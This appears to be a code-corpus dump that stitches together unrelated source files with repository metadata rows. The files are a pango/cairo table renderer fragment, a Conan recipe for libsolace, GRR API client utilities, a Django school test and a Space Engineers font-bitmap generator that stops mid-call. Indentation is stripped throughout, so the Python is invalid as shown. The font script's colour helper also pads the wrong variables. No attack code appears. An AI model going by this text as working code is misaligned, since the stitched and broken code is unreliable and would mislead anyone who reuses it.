fdesc = pango.FontDescription("Sans")
fdesc.set_size(fontsize * pango.SCALE)
self.pangolayout.set_font_description(fdesc)
self.drawTableHeading()
#Draw table data
rindex = page_nr * self.lines_per_page
offset = 0
addh= TABLE_TOP
try:
while (offset < self.lines_per_page):
row = self.content[rindex + offset]
cr.move_to(RIGHT_EDGE, addh)
cr.line_to(RIGHT_EDGE, addh+ROW_HEIGHT)
right_txt = RIGHT_EDGE
dindex = 0
for data in row:
right_txt -= MARGIN+LINE
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), addh + (ROW_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[dindex]
cr.move_to(right_txt, addh)
cr.line_to(right_txt, addh + ROW_HEIGHT)
dindex += 1
addh += ROW_HEIGHT
offset += 1
except IndexError:
pass
#Table top line
cr.move_to(right_txt, TABLE_TOP)
cr.line_to(RIGHT_EDGE, TABLE_TOP)
#Table bottom line
cr.move_to(right_txt, addh)
cr.line_to(RIGHT_EDGE, addh)
cr.stroke()
def setDrawFunction(self, func):
self.drawfunction = func
def drawTableHeading(self):
# RIGHT_EDGE = 570 #(table width + PAGE_MARGIN)
RIGHT_EDGE = self.page_setup.get_page_width(gtk.UNIT_POINTS) - config.rightmargin
HEADING_HEIGHT = self.heading_height
MARGIN = self.cell_margin
LINE = self.line
cr = self.cairo_context
htop = self.header_height + MARGIN
# #Heading top line
# cr.move_to(self.page_margin, htop)
# cr.line_to(RIGHT_EDGE, htop)
cr.move_to(RIGHT_EDGE, htop)
cr.line_to(RIGHT_EDGE, htop + HEADING_HEIGHT)
#Draw table headings
right_txt = RIGHT_EDGE
dindex = 0
for data in self.heading:
right_txt -= MARGIN+LINE
self.pangolayout.set_text(data)
(width, height) = self.pangolayout.get_size()
if (width / pango.SCALE) > self.cols_width[dindex]:
res = data.split()
self.pangolayout.set_text(res[0])
(width, height) = self.pangolayout.get_size()
if (width / pango.SCALE) < self.cols_width[dindex]:
#self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), htop + (HEADING_HEIGHT/2-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
#
self.pangolayout.set_text(res[1])
(width, height) = self.pangolayout.get_size()
#self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), htop + ((HEADING_HEIGHT*3)/2-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
else:
#self.pangolayout.set_alignment(pango.ALIGN_RIGHT)
cr.move_to (right_txt -(width / pango.SCALE), htop + (HEADING_HEIGHT-(height / pango.SCALE))/2)
self.pangocairo.show_layout(self.pangolayout)
right_txt -= self.cols_width[dindex]
cr.move_to(right_txt, htop)
cr.line_to(right_txt, htop + HEADING_HEIGHT)
dindex += 1
#Heading top line
cr.move_to(right_txt, htop)
cr.line_to(RIGHT_EDGE, htop)
# def dailySpecific(self, pos, page):
# pass
#
# def subjectSpecific(self, pos, page):
# pass
#
# def docSpecific(self, pos, page):
# pass
|
gpl-3.0
| 1,510,233,238,877,947,600 | 42.230024 | 188 | 0.555142 | false |
abbyssoul/libsolace
|
conanfile.py
|
1
|
2675
|
"""Conan recipe package for libsolace
"""
from conans import CMake, ConanFile
from conans.errors import ConanInvalidConfiguration
from conans.model.version import Version
class LibsolaceConan(ConanFile):
name = "libsolace"
description = "High performance components for mission critical applications"
license = "Apache-2.0"
author = "Ivan Ryabov <abbyssoul@gmail.com>"
url = "https://github.com/abbyssoul/conan-%s.git" % name
homepage = "https://github.com/abbyssoul/%s" % name
topics = ("HPC", "High reliability", "P10", "solace", "performance", "c++", "conan")
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"fPIC": [True, False]
}
default_options = {"shared": False, "fPIC": True}
generators = "cmake"
build_requires = "gtest/1.10.0"
scm = {
"type": "git",
"subfolder": name,
"url": "auto",
"revision": "auto"
}
@property
def _supported_cppstd(self):
return ["17", "gnu17", "20", "gnu20"]
@property
def _source_subfolder(self):
return self.name
def config_options(self):
compiler_version = Version(str(self.settings.compiler.version))
if self.settings.os == "Windows":
del self.options.fPIC
# Exclude compilers that claims to support C++17 but do not in practice
if (self.settings.compiler == "gcc" and compiler_version < "7") or \
(self.settings.compiler == "clang" and compiler_version < "5") or \
(self.settings.compiler == "apple-clang" and compiler_version < "9"):
raise ConanInvalidConfiguration("This library requires C++17 or higher support standard. {} {} is not supported".format(self.settings.compiler, self.settings.compiler.version))
if self.settings.compiler.cppstd and not self.settings.compiler.cppstd in self._supported_cppstd:
raise ConanInvalidConfiguration("This library requires c++17 standard or higher. {} required".format(self.settings.compiler.cppstd))
def _configure_cmake(self):
cmake = CMake(self, parallel=True)
cmake.definitions["PKG_CONFIG"] = "OFF"
cmake.configure(source_folder=self._source_subfolder)
return cmake
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
cmake = self._configure_cmake()
cmake.install()
self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
def package_info(self):
self.cpp_info.libs = ["solace"]
if self.settings.os == "Linux":
self.cpp_info.libs.append("m")
|
apache-2.0
| 3,942,592,968,079,367,000 | 36.152778 | 186 | 0.634393 | false |
dunkhong/grr
|
api_client/python/grr_api_client/utils.py
|
1
|
6628
|
#!/usr/bin/env python
"""Utility functions and classes for GRR API client library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import time
from future.builtins import map
from google.protobuf import wrappers_pb2
from google.protobuf import symbol_database
from grr_api_client import errors
from grr_response_proto import apple_firmware_pb2
from grr_response_proto import checks_pb2
from grr_response_proto import deprecated_pb2
from grr_response_proto import flows_pb2
from grr_response_proto import jobs_pb2
from grr_response_proto import osquery_pb2
from grr_response_proto import timeline_pb2
from grr_response_proto.api import artifact_pb2
from grr_response_proto.api import client_pb2
from grr_response_proto.api import config_pb2
from grr_response_proto.api import cron_pb2
from grr_response_proto.api import flow_pb2
from grr_response_proto.api import hunt_pb2
from grr_response_proto.api import output_plugin_pb2
from grr_response_proto.api import reflection_pb2
from grr_response_proto.api import stats_pb2
from grr_response_proto.api import user_pb2
from grr_response_proto.api import vfs_pb2
from grr_response_proto.api import yara_pb2
class ProtobufTypeNotFound(errors.Error):
pass
class ItemsIterator(object):
"""Iterator object with a total_count property."""
def __init__(self, items=None, total_count=None):
super(ItemsIterator, self).__init__()
self.items = items
self.total_count = total_count
def __iter__(self):
for i in self.items:
yield i
def __next__(self):
return next(self.items)
# TODO: Compatibility method for Python 2.
def next(self):
return self.__next__()
def MapItemsIterator(function, items):
"""Maps ItemsIterator via given function."""
return ItemsIterator(
items=map(function, items), total_count=items.total_count)
class BinaryChunkIterator(object):
"""Iterator object for binary streams."""
def __init__(self, chunks=None, total_size=None, on_close=None):
super(BinaryChunkIterator, self).__init__()
self.chunks = chunks
self.total_size = total_size
self.on_close = on_close
def Close(self):
if self.on_close:
self.on_close()
self.on_close = None
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Close()
def __iter__(self):
for c in self.chunks:
yield c
self.Close()
def __next__(self):
try:
return next(self.chunks)
except StopIteration:
self.Close()
raise
# TODO: Compatibility method for Python 2.
def next(self):
return self.__next__()
def WriteToStream(self, out):
for c in self.chunks:
out.write(c)
self.Close()
def WriteToFile(self, file_name):
with open(file_name, "wb") as fd:
self.WriteToStream(fd)
# Default poll interval in seconds.
DEFAULT_POLL_INTERVAL = 15
# Default poll timeout in seconds.
DEFAULT_POLL_TIMEOUT = 3600
def Poll(generator=None, condition=None, interval=None, timeout=None):
"""Periodically calls generator function until a condition is satisfied."""
if not generator:
raise ValueError("generator has to be a lambda")
if not condition:
raise ValueError("condition has to be a lambda")
if interval is None:
interval = DEFAULT_POLL_INTERVAL
if timeout is None:
timeout = DEFAULT_POLL_TIMEOUT
started = time.time()
while True:
obj = generator()
check_result = condition(obj)
if check_result:
return obj
if timeout and (time.time() - started) > timeout:
raise errors.PollTimeoutError(
"Polling on %s timed out after %ds." % (obj, timeout))
time.sleep(interval)
AFF4_PREFIX = "aff4:/"
def UrnStringToClientId(urn):
"""Converts given URN string to a client id string."""
if urn.startswith(AFF4_PREFIX):
urn = urn[len(AFF4_PREFIX):]
components = urn.split("/")
return components[0]
def UrnStringToHuntId(urn):
"""Converts given URN string to a flow id string."""
if urn.startswith(AFF4_PREFIX):
urn = urn[len(AFF4_PREFIX):]
components = urn.split("/")
if len(components) != 2 or components[0] != "hunts":
raise ValueError("Invalid hunt URN: %s" % urn)
return components[-1]
TYPE_URL_PREFIX = "type.googleapis.com/"
def GetTypeUrl(proto):
"""Returns type URL for a given proto."""
return TYPE_URL_PREFIX + proto.DESCRIPTOR.full_name
def TypeUrlToMessage(type_url):
"""Returns a message instance corresponding to a given type URL."""
if not type_url.startswith(TYPE_URL_PREFIX):
raise ValueError("Type URL has to start with a prefix %s: %s" %
(TYPE_URL_PREFIX, type_url))
full_name = type_url[len(TYPE_URL_PREFIX):]
try:
return symbol_database.Default().GetSymbol(full_name)()
except KeyError as e:
raise ProtobufTypeNotFound(str(e))
def CopyProto(proto):
new_proto = proto.__class__()
new_proto.ParseFromString(proto.SerializeToString())
return new_proto
class UnknownProtobuf(object):
def __init__(self, proto_type, proto_any):
super(UnknownProtobuf, self).__init__()
self.type = proto_type
self.original_value = proto_any
def UnpackAny(proto_any):
try:
proto = TypeUrlToMessage(proto_any.type_url)
except ProtobufTypeNotFound as e:
return UnknownProtobuf(str(e), proto_any)
proto_any.Unpack(proto)
return proto
def RegisterProtoDescriptors(db, *additional_descriptors):
"""Registers all API-releated descriptors in a given symbol DB."""
db.RegisterFileDescriptor(apple_firmware_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(artifact_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(client_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(config_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(cron_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(flow_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(hunt_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(output_plugin_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(reflection_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(stats_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(user_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(vfs_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(yara_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(checks_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(deprecated_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(flows_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(jobs_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(osquery_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(timeline_pb2.DESCRIPTOR)
db.RegisterFileDescriptor(wrappers_pb2.DESCRIPTOR)
for d in additional_descriptors:
db.RegisterFileDescriptor(d)
|
apache-2.0
| -3,259,828,917,412,572,000 | 25.943089 | 77 | 0.724955 | false |
eduvik/django-school-repo
|
django-school-project/school/tests/test_school.py
|
1
|
2760
|
from django.test import TestCase
from school.models import Semester, StaffMember, Department, Subject, SchoolClass, Student, Enrolment
from sync.google_admin import GoogleSync
from django.conf import settings
import datetime
#class SchoolTest(TestCase):
class SchoolTest(TestCase):
def setUp(self):
#import pdb
#pdb.set_trace()
self.google_sync = GoogleSync()
self.sem, c = Semester.objects.get_or_create(number=1, year="2013",
start_date=datetime.date(2013,1,29), end_date=datetime.date(2013,6,7))
self.tch, c = StaffMember.objects.get_or_create(
first_name="John", last_name="Teacher",
email="john.teacher@" + settings.GOOGLE_APPS_DOMAIN,
date_of_birth=datetime.date(1970,3,3), timetable_id="XTCH",
is_current=True,
staff_type="TEA"
)
#self.google_sync.update_google_staff(self.tch)
self.dept, c = Department.objects.get_or_create(name="Test Faculty")
self.subj, c = Subject.objects.get_or_create(code="14XTST", name="Test Subject", faculty=self.dept)
self.cla, c = SchoolClass.objects.get_or_create(code="14XTSTB", name="Test Class B", cycle=self.sem,
teacher=self.tch, subject=self.subj)
self.students = []
for i in range(1,5):
id='XTST%04d' % i
s, c = Student.objects.get_or_create(
first_name="Test%d"%i, last_name="Student%d"%i,
email="%s@%s" % (id, settings.GOOGLE_APPS_DOMAIN),
date_of_birth=datetime.date(2000,3,(i%27)+1), timetable_id=id,
is_current=True,
student_type="STU", year_level="14"
)
#self.google_sync.update_google_student(s)
Enrolment.objects.get_or_create(student=s, school_class=self.cla)
self.students.append(s)
# def test_student_create(self):
# pass
#
# def test_student_update(self):
# pass
#
# def test_student_exit(self):
# pass
#
# def test_staff_create(self):
# pass
#
# def test_staff_update(self):
# pass
#
# def test_staff_exit(self):
# pass
#
# def test_class_create(self):
# pass
|
agpl-3.0
| -2,396,704,660,212,860,000 | 44.262295 | 112 | 0.483696 | false |
zcold/sefontpy
|
sefontmap.py
|
1
|
23407
|
# coding: utf-8
# The MIT License (MIT)
# Copyright (c) 2014 by Shuo Li (contact@shuo.li)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
__author__ = 'Shuo Li <contact@shuol.li>'
__version__= '2014-09-27-12:42'
import timeit
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import os
from os import listdir
from os.path import isfile, join
import copy
import re
import shutil
import xml.etree.ElementTree as ET
import jinja2
# from fontTools.ttLib import TTFont
import PIL
from PIL import ImageFont, ImageDraw
if 'define constants' :
def file_names_in_folder(folder) :
abs_folder = os.path.abspath(folder)
return [ f for f in listdir(abs_folder)
if isfile(join(abs_folder,f)) ]
def get_default_image() :
return PIL.Image.new( 'RGBA', (image_width, image_height) )
if isfile('config.py') :
config_module = __import__( 'config' )
config = config_module.config
else :
# a font bitmap set has no shadow to keep location consistency.
shadow_size = 3
def construct_color(r, g, b) :
rx = hex(r).split('x')[1]
if len(rx) == 1 :
rx = '0' + rx
gx = hex(g).split('x')[1]
if len(gx) == 1 :
gx = '0' + rx
bx = hex(b).split('x')[1]
if len(gx) == 1 :
gx = '0' + rx
return '#' + rx + gx + bx
blue = construct_color(214, 244, 255)
darkblue = construct_color(118, 200, 241)
green = construct_color(101, 181, 91)
red = construct_color(228, 63, 63)
white = construct_color(255, 255, 255)
black = construct_color(0, 0, 0)
shadow_color = construct_color(50, 50, 50)
config = {
'Do not delete this configure file.' : ''
# The base folder of this font map generator.
, 'base folder'
: './'
# The folder stores all TrueType font (.ttf) files.
# The specified folder is relative to this configure file.
# Absolute folder will be base folder + font folder.
, 'font folder'
: 'fonts'
# The Space Engineers (SE) installation path.
, 'space engineer base folder'
: 'C:\Program Files (x86)\Steam\SteamApps\common\SpaceEngineers'
# Font size in SE
, 'font size'
: 28
# The font priority list, from high to low.
# The bitmap of each character
# is given by the TrueType font (.tff)
# who has a valid bitmap and a highest priority.
, 'font priority list'
: [ ]
# The width of the result .dds image.
, 'image width'
: 1024
# The width of the result .dds image
, 'image height'
: 1024
# output .dds file name prefix
, 'output dds prefix'
: 'FontDataExtra-'
# Original dds file names.
# They are used when
# the user wants to keep the original font bitmaps
# and only construct the characters that
# are not included in the original font bitmaps.
, 'original dds file names'
: [ 'FontData-0.dds' ]
# Predefined colors
, 'predefined colors'
: { 'blue': {
'output' : True,
'color': blue,
'shadow_color': shadow_color,
'shadow_size': shadow_size,
'shadow' : False },
'darkblue': {
'output' : True,
'color': darkblue,
'shadow_color': shadow_color,
'shadow_size': shadow_size,
'shadow' : False },
'green': {
'output' : True,
'color': green,
'shadow_color': shadow_color,
'shadow_size': shadow_size,
'shadow' : False },
'red': {
'output' : True,
'color': red,
'shadow_color': shadow_color,
'shadow_size': shadow_size,
'shadow' : False },
'white': {
'output' : True,
'color': white,
'shadow_color': shadow_color,
'shadow_size': shadow_size,
'shadow' : False },
'white_shadow': {
'output' : True,
'color': white,
'shadow_color': shadow_color,
'shadow_size': shadow_size,
'shadow' : True }
}
# Left Side Bearing, lsb
#
# illusion:
#
# |< last >| |< this >|
# |< char >| |< char >|
# |< bitmap >||< lsb >||< bitmap >|
#
, 'lsb'
: -1
# font map xml template file
, 'xml template'
: 'xml_template.xml'
# font map xml file name
, 'xml file name'
: 'FontData.xml'
# font place holder north margin
, 'north margin'
: 0
# font place holder west margin
, 'west margin'
: 0
# font place holder south margin
, 'south margin'
: 0
# font place holder east margin
, 'east margin'
: 0
# keep original font map
, 'keep original font map'
: True
, 'text file folder'
: 'text_files'
, 'unsupported folder'
: 'unsupported'
, 'backup folder'
: 'backup'
, 'output folder'
: 'output'
}
keep_original = bool(config['keep original font map'])
output_dds_prefix = str(config['output dds prefix'])
original_dds_file_names = config['original dds file names']
se_folder = str(config['space engineer base folder'])
font_size = int(config['font size'])
base_folder = str(config['base folder'])
font_folder = base_folder + str(config['font folder'])
font_folder = os.path.abspath(font_folder)
output_folder = base_folder + str(config['output folder'])
output_folder = os.path.abspath(output_folder)
font_priority_list = config['font priority list']
font_priority_list = []
font_files_in_folder = file_names_in_folder(font_folder)
font_files = [ join(font_folder, f) for f in list(font_priority_list)]
for f in font_files_in_folder :
if f not in font_priority_list :
font_files.append(join(font_folder, f))
fonts = [ { 'face' : 'freetype.Face(f)',
'font' : ImageFont.truetype(f, font_size),
'font_size' : font_size,
'file_name' : os.path.basename(f)}
for f in font_files ]
unsupported_folder = config['unsupported folder']
image_width = int(config['image width'])
image_height = int(config['image height'])
color_dict = config['predefined colors']
lsb = config['lsb']
xml_template_name = str(config['xml template'])
xml_file_name = str(config['xml file name'])
north_margin = int(config['north margin'])
west_margin = int(config['west margin'])
south_margin = int(config['south margin'])
east_margin = int(config['east margin'])
text_file_folder = os.path.abspath(str(config['text file folder']))
backup_folder = str(config['backup folder'])
if 'define classes' :
class location() :
'''
Location class
'''
def __init__(self, x, y) :
self.x = x
self.y = y
def clone(self) :
return location(x, y)
def __str__(self) :
return '(%s, %s)' % (self.x, self.y)
def add_sub_action(self, another_location, mode = '+') :
def add_sub(a, b, mode = '+') :
if mode == '+' :
return a + b
if mode == '-' :
return a - b
raise NotImplementedError()
if isinstance(another_location, location) :
return location(
add_sub( self.x,
another_location.x,
mode),
add_sub( self.y,
another_location.y,
mode))
if isinstance(another_location, tuple) \
or isinstance(another_location, list) :
if len(another_location) == 2 :
return location(
add_sub( self.x,
int(another_location[0]),
mode),
add_sub( self.y,
int(another_location[1]),
mode))
if isinstance(another_location, dict) :
if 'x' in another_location.keys() and 'y' in another_location.keys() :
return location(
add_sub( self.x,
int(another_location['x']),
mode),
add_sub( self.y,
int(another_location['y']),
mode))
raise NotImplementedError()
def __add__(self, another_location) :
return self.add_sub_action(another_location, mode = '+')
def __sub__(self, another_location) :
return self.add_sub_action(another_location, mode = '-')
class char() :
'''
Character class
'''
def __init__(self, content) :
self.content = content
def map(self, color, fonts,
north_margin = north_margin,
west_margin = west_margin,
south_margin = south_margin,
east_margin = east_margin,
unsupported = {}) :
def haschar(font, one_character, unsupported = {}) :
'''
Return if a font has a character.
'''
return True
# ttf_face = font['face']
# font_file_name = font['file_name']
# ttf_face.set_char_size( 48*64 )
# ttf_face.load_char(one_character)
# a = copy.deepcopy(ttf_face.glyph.bitmap.buffer)
# b = []
# if font_file_name in unsupported.keys() :
# if one_character in unsupported[ font_file_name ] :
# return False
# ttf_face.load_char(unsupported[ font_file_name ][0])
# b = copy.deepcopy(ttf_face.glyph.bitmap.buffer)
# return a != b
self.color = color
self.font = None
for f in fonts :
if haschar(f, one_character = self.content,
unsupported = unsupported) :
self.font = f['font']
self.font_size = f['font_size']
break
if self.font == None :
print 'Warning! No font file has \'%s\'.' % self.content
self.font = fonts[0]['font']
self.font_size = f['font_size']
self.width, self.height = self.font.getsize(self.content)
self.shadow_size = color['shadow_size']
self.width += (self.shadow_size * 2)
self.height += (self.shadow_size * 2)
self.size = (self.width, self.height)
self.holder_height = north_margin + self.font_size + south_margin
self.holder_height += (self.shadow_size * 4)
self.holder_width = west_margin + self.width + east_margin
self.holder_size = (self.holder_width, self.holder_height)
def locate(self, code, image_location, image_index, left_sep) :
self.code = code
self.image_location = image_location
self.image_index = image_index
self.left_sep = left_sep
def attribute(self) :
return { 'content' : escape(self.content),
'code' : get_code_string(self.code),
'image_index' : self.image_index,
'x' : self.image_location.x,
'y' : self.image_location.y + self.shadow_size,
'width' : self.width-1,
'height' : self.holder_height - (self.shadow_size*2),
'advance_width' : self.width - (self.shadow_size*2),
'left_sep' : self.left_sep }
if 'define misc. functions' :
def cleanup(folder_paths, file_names = [], remove_ext_name = ['.pyc', '.png']) :
for folder_path in folder_paths :
for f in file_names :
os.remove(join(os.path.abspath(folder_path), f))
for f in file_names_in_folder(folder_path) :
for ext_name in remove_ext_name :
if f.endswith(ext_name) :
os.remove(join(folder_path, f))
def distinct(string_list) :
one_list = ''
for s in string_list :
one_list += s
one_list = list(set(one_list))
return one_list
def save_dds(pillow_image, index = 0, output_folder = './'):
output_folder = os.path.abspath(output_folder)
temp_file_path = join(output_folder, 'temp_%s.png' % index)
output_file_path = join(output_folder, '%s%s.dds' % (output_dds_prefix, index))
pillow_image.save(temp_file_path)
os.system(r'.\nvtt\nvcompress.exe -nocuda -bc3 %s %s' \
% (temp_file_path, output_file_path ))
os.remove(temp_file_path)
def compute_location(one_char, draw_location, target_images) :
(w, h) = target_images[-1].size
# to the next line
if draw_location.x + one_char.holder_width >= w :
draw_location.y += one_char.holder_height
draw_location.x = 0
# to the next image
if draw_location.y + one_char.holder_height >= h :
target_images.append(get_default_image())
draw_location.y = 0
return draw_location, target_images
def draw_one_char_to_image(one_char, draw_location, target_image, west_margin, south_margin) :
'''
Draw one char on one image
'''
def draw_once(draw, color, xshift, yshift,) :
draw.text( ( draw_location.x + xshift,
draw_location.y + yshift),
one_char.content,
font = one_char.font,
fill = color )
draw = ImageDraw.Draw(target_image)
if one_char.color['shadow'] == True :
for i in xrange(one_char.shadow_size) :
draw_once(draw, one_char.color['shadow_color'], +i, +i)
draw_once(draw, one_char.color['shadow_color'], one_char.shadow_size + 1 + i, +i)
draw_once(draw, one_char.color['shadow_color'], +i, one_char.shadow_size + 1 + i)
draw_once(draw, one_char.color['shadow_color'],
one_char.shadow_size + 1 + i, one_char.shadow_size + 1 + i)
draw_once(draw, one_char.color['color'], one_char.shadow_size, one_char.shadow_size)
return draw_location + (one_char.holder_width, 0), target_image
def write_char_to_image( one_char, draw_location, code,
image_start_index,
target_images = [ get_default_image() ] ) :
if not isinstance(target_images, list) :
target_images = [ target_images ]
# compute char bitmap location
draw_location, target_images \
= compute_location(one_char, draw_location, target_images)
one_char.locate(code, draw_location, image_start_index + len(target_images) - 1, lsb)
# draw one char
loc, target_images[-1] \
= draw_one_char_to_image( one_char, draw_location, target_images[-1],
west_margin, south_margin)
return one_char, loc, target_images
def save_images(images, output_folder) :
i = 0
for image in images :
save_dds(image, i, output_folder)
i += 1
def get_code_string(decimal_code) :
return hex(decimal_code).split('x')[1]
def escape(input_string) :
html_escape_table = {
unicode('&'): unicode("&"),
unicode('"'): unicode("""),
unicode("'"): unicode("'"),
unicode(">"): unicode(">"),
unicode("<"): unicode("<") }
input_string = unicode(input_string)
if input_string in html_escape_table.keys() :
return html_escape_table[ input_string ]
return input_string
def get_char_list(xml_file_name) :
tree = ET.parse(xml_file_name)
root = tree.getroot()
glyphs = [ child for child in root if child.tag.endswith('glyphs') ][0]
max_code = max([ int('0x' + glyph.attrib['code'], 16) for glyph in glyphs ])
return [ glyph.attrib['ch'] for glyph in glyphs ], max_code
def get_original_xml_attributes(xml_file_name) :
tree = ET.parse(xml_file_name)
root = tree.getroot()
glyphs = [ child for child in root if child.tag.endswith('glyphs') ][0]
kernpairs = [ child for child in root if child.tag.endswith('kernpairs') ][0]
glyphs_attribute_list = [ {
'content' : escape(glyph.attrib['ch']),
'code' : glyph.attrib['code'],
'bm' : glyph.attrib['bm'],
'origin' : glyph.attrib['origin'],
'size' : glyph.attrib['size'],
'aw' : glyph.attrib['aw'],
'lsb' : glyph.attrib['lsb'] }
for glyph in glyphs ]
kernpair_attribute_list = [ {
'left' : escape(kernpair.attrib['left']),
'right' : escape(kernpair.attrib['right']),
'adjust' : kernpair.attrib['adjust'] }
for kernpair in kernpairs ]
return glyphs_attribute_list, kernpair_attribute_list
def write_text_to_image(text, color, unsupported, start_code, output_folder = output_folder,
image_start_index = 0,
north_margin = north_margin,
west_margin = west_margin,
south_margin = south_margin,
east_margin = east_margin) :
draw_location = location(0, 0)
target_images = [ get_default_image() ]
current_code = start_code
char_list = []
for c in text :
# create a char object
one_char = char(content = c)
# map a char to a bitmap
one_char.map( color = color, fonts = fonts,
north_margin = north_margin,
west_margin = west_margin,
south_margin = south_margin,
east_margin = east_margin,
unsupported = unsupported )
one_char, draw_location, target_images \
= write_char_to_image( one_char = one_char,
draw_location = draw_location,
code = current_code,
image_start_index = image_start_index,
target_images = target_images )
char_list.append(one_char)
current_code += 1
save_images(target_images, output_folder)
return char_list, target_images
def produce_xml(char_list, target_images, output_folder,
keep_original, original_xml_file_name) :
env = jinja2.Environment()
env.loader = jinja2.FileSystemLoader('./')
template = env.get_template(xml_template_name)
xml_file = open(join(output_folder, xml_file_name), 'w+')
char_attribute_list = [ c.attribute() for c in char_list ]
dds_files = []
glyphs_attribute_list = []
kernpair_attribute_list = []
image_index = 0
if keep_original == True :
for n in original_dds_file_names :
dds_files.append( { 'index' : image_index, 'name': n } )
image_index += 1
glyphs_attribute_list, kernpair_attribute_list = \
get_original_xml_attributes(original_xml_file_name)
dds_files += [ { 'index' : i + image_index, 'name': '%s%s.dds' % (output_dds_prefix, i) }
for i in xrange(len(target_images)) ]
xml_file.write( template.render(
char_attribute_list = char_attribute_list,
dds_files = dds_files,
glyphs_attribute_list = glyphs_attribute_list,
kernpair_attribute_list = kernpair_attribute_list ) )
def get_original_text(base_folder, backup_folder, xml_file_name) :
original_xml_file_name = join(backup_folder, 'red\\' + xml_file_name)
original_xml_file_name_copy = join(base_folder, 'original_' + xml_file_name)
shutil.copy2(original_xml_file_name, original_xml_file_name_copy)
return get_char_list(xml_file_name = original_xml_file_name_copy)
def backup_se_font_map(se_folder, backup_folder) :
if not os.path.exists(backup_folder) :
shutil.copytree(join(se_folder, 'Content\\Fonts'), backup_folder )
else :
if not os.listdir(backup_folder) :
os.rmdir(backup_folder )
shutil.copytree(join(se_folder, 'Content\\Fonts'), backup_folder )
def include_text_files(base_folder, text_file_folder) :
text_files = file_names_in_folder(text_file_folder)
text_mod_files = [ f for f in text_files if f.endswith('.py') ]
for f in text_files :
shutil.copy2(join(text_file_folder, f), join(base_folder, f))
text_file_modules = [ __import__( f.split('.')[0]) for f in text_mod_files ]
result = []
for m in text_file_modules :
result += distinct(m.text)
return text_files, distinct(result)
def check_unsupported_files (base_folder, unsupported_folder) :
unsupported_files = file_names_in_folder(unsupported_folder)
for f in unsupported_files :
shutil.copy2(join(unsupported_folder, f), join(base_folder, f))
unsupported_file_modules = [ __import__( f.split('.')[0]) for f in unsupported_files ]
unsupported = {}
for m in unsupported_file_modules :
for key, value in m.unsupported_char.items() :
unsupported[key] = value
return unsupported_files, unsupported
start_time = timeit.default_timer()
backup_se_font_map(se_folder, backup_folder)
text_original, max_code = get_original_text(base_folder, backup_folder, xml_file_name)
text_files, text_in_files = include_text_files(base_folder, text_file_folder)
unsupported_files, unsupported = check_unsupported_files (base_folder, unsupported_folder)
if not os.path.exists(output_folder) :
os.mkdir(output_folder)
if not keep_original :
text = distinct(text_in_files + text_original)
start_code = 0
else :
text = list(set(text_in_files).symmetric_difference(text_original))
start_code = max_code + 1
# generate font map
for c, v in color_dict.items() :
if v['output'] == True :
print 'Generate bitmap for %s ...' % c
if os.path.exists(join(output_folder, c)) :
shutil.rmtree(join(output_folder, c))
if not os.path.exists(join(output_folder, c)) :
os.mkdir(join(output_folder, c))
if keep_original == True :
for n in original_dds_file_names :
shutil.copy2(
join( backup_folder, c + '\\' + n),
join( output_folder, c + '\\' + n) )
original_xml_file_name \
= os.path.abspath(join( backup_folder, c + '\\' + xml_file_name))
print 'Done'
print
print 'Write bitmap to dds.'
char_list, target_images \
= write_text_to_image(
text = text, color = v, unsupported = unsupported,
start_code = copy.deepcopy(start_code),
output_folder = join(output_folder, c),
image_start_index = len(original_dds_file_names),
north_margin = north_margin, west_margin = west_margin,
south_margin = south_margin, east_margin = east_margin )
print 'Done'
print
print 'Generate XML for %s ...'
produce_xml(char_list, target_images, join(output_folder, c),
keep_original, original_xml_file_name)
print 'Done'
print 'All image and XMl generations done.'
print
print 'Cleaning up temp files...'
cleanup( folder_paths = [ base_folder ],
file_names = text_files + unsupported_files,
